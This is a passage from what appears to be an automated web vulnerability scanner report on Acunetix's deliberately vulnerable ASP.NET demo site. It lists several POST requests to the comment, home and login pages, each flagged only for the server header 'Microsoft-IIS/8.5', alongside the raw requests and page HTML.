align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Content-Length: 1373 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,373 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Content-Length: 1681 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,681 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ%2BTqRo3QvanE8jv9G&tbComment=&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Content-Length: 1501 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,501 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg%2FaWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP%2FMHHnstJY%2FfWtD4cYSdoYkheQ%3D%3D&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQLj8dP9DwKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7&tbComment=&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
